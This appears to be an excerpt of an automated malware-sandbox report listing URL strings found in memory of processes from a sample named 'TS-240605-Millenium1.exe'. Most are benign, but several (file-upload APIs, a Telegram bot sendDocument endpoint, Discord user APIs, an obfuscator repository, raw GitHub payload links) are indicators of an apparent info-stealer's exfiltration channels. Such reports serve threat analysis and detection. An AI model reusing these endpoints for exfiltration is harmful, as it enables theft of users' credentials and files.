hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1869510865.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB7D34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: TS-240605-Millenium1.exe, 00000000.00000003.1833690751.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830279591.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829896804.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1833414858.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1831955754.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1832583214.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830776920.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1829490121.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000000.00000003.1830531474.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1871745230.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868701636.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988C2000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1867122240.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1881211961.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868238836.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1870307360.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1868965314.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000006.00000003.1869235010.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1868737646.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1876957083.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: powershell.exe, 00000013.00000002.2061867886.0000022E6DDC9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: based.exe, 00000008.00000003.1895238949.000001EB877B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1895238949.000001EB87819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: powershell.exe, 00000013.00000002.1988409193.0000022E557B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894354019.000001EB87177000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://api.telegram.org/file/bot
Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: based.exe, 00000007.00000003.1878091642.00000235B9F90000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: based.exe, 00000008.00000002.2123124196.000001EB87080000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: based.exe, 00000008.00000003.1893065874.000001EB8717D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892158606.000001EB8717A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1892458033.000001EB87F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000013.00000002.1988409193.0000022E559D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874E048000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86AC8000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899911021.000001BF9992C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: based.exe, 00000008.00000002.2123124196.000001EB871E2000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1902852468.000001EB87804000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1905635031.000001EB87863000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: TS-240605-Millenium1.exe, 00000002.00000002.1855753005.000002874C7BA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1844669897.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854187302.000002874C7AF000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1845312833.000002874C7AA000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839504672.000002874C7AB000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1854923957.000002874C7B9000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000003.1839762622.000002874C79E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E80000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893228984.000001BF980A8000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894303489.000001BF980AF000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893168050.000001BF98074000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1893091311.000001BF98060000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894648011.000001BF98076000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1895320575.000001BF980B3000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894810312.000001BF98085000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000003.1894195461.000001BF980AA000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1899460888.000001BF98089000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: based.exe, 00000008.00000002.2126543094.000001EB87F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2125974666.000001EB87812000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120360311.000001EB8753C000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124224043.000001EB87540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/29207
Source: based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: based.exe, 00000008.00000003.2121207876.000001EB871FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
Source: based.exe, 00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gstatic.com/generate_204
Source: based.exe, 00000008.00000003.2119768607.000001EB8750D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124170851.000001EB87518000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2121133626.000001EB87516000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2120248212.000001EB8750E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: based.exe, 00000008.00000003.1899424084.000001EB87177000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://json.org
Source: powershell.exe, 00000013.00000002.2043156118.0000022E65827000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: based.exe, 00000008.00000003.1889915648.000001EB86F1A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.1889699362.000001EB86EE0000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2123009852.000001EB86F80000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://peps.python.org/pep-0205/
Source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://peps.python.org/pep-0263/
Source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp	String found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: main.exe, 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt
Source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt-
Source: based.exe, 00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.png
Source: based.exe, 00000008.00000003.1894602665.000001EB871B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngz
Source: main.exe, 00000015.00000002.1999999146.0000025EB7D62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com~?0i
Source: based.exe, 00000007.00000003.1877669650.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000020.00000002.2494944873.0000023340566000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://semver.org/
Source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://system.data.sqlite.org/
Source: based.exe, 00000008.00000002.2125738623.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2119154744.000001EB877C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: based.exe, 00000008.00000003.2121494998.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122798153.000001EB86E96000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2124317815.000001EB8757A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: based.exe, 00000008.00000002.2127328411.000001EB88234000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: based.exe, 00000008.00000002.2127328411.000001EB88180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: svchost.exe, 00000016.00000003.1950071830.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: based.exe, 00000007.00000003.1876475016.00000235B9F83000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2131676898.00007FFDFAC30000.00000004.00000001.01000000.0000001C.sdmp, based.exe, 00000008.00000002.2138193378.00007FFE00828000.00000004.00000001.01000000.0000001D.sdmp, svchost.exe, 00000016.00000003.1957532160.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: hacn.exe, 00000006.00000003.1869625462.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: TS-240605-Millenium1.exe, 00000002.00000003.1839123127.000002874E458000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1855851675.000002874DFC0000.00000004.00001000.00020000.00000000.sdmp, based.exe, 00000008.00000002.2122521044.000001EB86A40000.00000004.00001000.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.1901068815.000001BF9A1E8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: TS-240605-Millenium1.exe, TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB200000.00000040.00000001.01000000.00000005.sdmp, based.exe, based.exe, 00000008.00000002.2132559008.00007FFDFB200000.00000040.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.python.org/psf/license/
